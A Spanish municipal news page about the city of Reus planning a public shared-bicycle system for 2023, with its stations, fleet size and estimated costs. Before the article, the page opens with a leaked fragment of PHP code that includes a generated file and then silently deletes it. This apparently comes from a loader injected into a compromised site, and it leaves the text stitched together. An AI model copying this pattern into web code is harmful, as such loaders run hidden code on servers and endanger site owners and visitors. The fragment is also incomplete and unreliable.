");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Reus tendrá un sistema de bicicleta pública compartida
Iconos cabecera

Destacamos

  • SEM 2021SEM 2021
    Semana Europea de la Movilida 2021

Reus tendrá un sistema de bicicleta pública compartida (19/07/2021)

El Ayuntamiento de Reus, a través de la empresa municipal Reus Movilidad y Servicios, trabaja para implantar en la ciudad un sistema de bicicleta pública compartida. El proyecto, definido en el Plan de Acción Municipal 2021-2023, prevé empezar a ser una realidad en el año 2023. El proyecto municipal de bicicleta compartida enmarca en las políticas de promoción de la movilidad sostenible que impulsa el Gobierno de Reus , junto con la revisión del Plan de movilidad Urbana, la redacción de la nueva ordenanza de movilidad y el desarrollo del Plan de la Bicicleta.

El Ayuntamiento de Reus ha encargado el estudio para la implantación del servicio de bicicleta compartida en la empresa municipal Reus Movilidad y Servicios, que plantea ofrecer un servicio 24 horas con la atención centralizada desde el Centro de Control, desde donde se gestiona la red de parkings municipales y el servicio de transporte urbano.

Ahora se estudia cuál es la mejor manera para hacerlo con el objetivo de crear un sistema de transporte público individual a partir de la bicicleta compartida, que facilite a los ciudadanos hacer sus desplazamientos habituales por la ciudad en bicicleta, de una manera sostenible, saludable y económica.

Movilidad sostenible y compartida

El sistema de bicicleta pública compartida permitirá poner a disposición de la ciudadanía un conjunto de bicicletas -distribuidas en varios puntos de la ciudad- a un precio asequible, para incentivar el uso de la bicicleta como medio de transporte saludable y sostenible, a la vez que complementará la oferta de movilidad pública y compartida.

La voluntad del Ayuntamiento con el encargo en Reus Movilidad y Servicios, es definir un modelo propio que se gestione desde la empresa municipal, con la experiencia tecnológica y de recursos humanos que ya trabaja con los parkings municipales o los autobuses urbanos. Uno de los modelos de referencia para la bicicleta compartida de Reus es el de la ciudad de Girona, donde han diseñado y adquirido las piezas de las bicicletas y de los anclajes, con el objetivo de hacer con recursos propios la instalación y el montaje de las bicicletas y las estaciones.

Este 2021 ya se han dado los primeros pasos para la bicicleta compartida. En enero se firmó un convenio con el Ayuntamiento de Girona y desde Reus Movilidad y Servicios ya se ha elaborado un estudio previo para la implantación de la bicicleta compartida. El próximo paso es la contratación de un técnico especialista para definir concretamente cuál es el modelo de bicicleta compartida y adaptar su gestión a la estructura de la empresa municipal, con la experiencia del Centro de Control.

Las primeras bicicletas, en 2023

Reus Movilidad y Servicios podría ofrecer un servicio 24 horas, con una docena de estaciones en una primera fase y entre 150/200 bicicletas. Tanto el número de estaciones como el número total de vehículos, se iría incrementando a partir de la puesta en marcha del servicio. Las estaciones o puntos de recogida de bicicleta se pondrían primero en las zonas más densas y con usos diversos para llegar gradualmente a la periferia de la ciudad.

Ahora la empresa municipal trabaja para definir el proyecto con el objetivo de que a lo largo de 2023 se puedan ver las primeras bicicletas compartidas circulando por la ciudad.

Aún falta concretar cómo serán las bicicletas, lo que sí se puede decir es que se ha descartado que sean eléctricas para el tamaño de la ciudad y la orografía del terreno. La experiencia en sistemas similares indica que la media de uso de la bicicleta compartida tiene una duración de 15 minutos, con un recorrido de unos 2,5 kilómetros.

También hay que definir cómo funcionará el servicio y qué coste tendrá para el usuario, pero hay que recordar que Reus Movilidad y Servicios ya dispone de una aplicación de movilidad que a estas alturas sirve para pagar la zona azul y para activar los puntos de recarga para vehículos eléctricos distribuidos por toda la ciudad.

Se estima que el coste aproximitat anual puede ser de 385.000 euros incluyendo la infraestructura -estaciones y bicicletas-, los vehículos para trasladar las bicicletas de un punto a otro, la creación de 4 puestos de trabajo y los gastos de mantenimiento.

Fuente: Ayuntamiento de Reus

Reus tendrá un sistema de bicicleta pública compartida

[Volver a Noticias]

 
Calle de Anselm Clavé, 1 43004 - Tarragona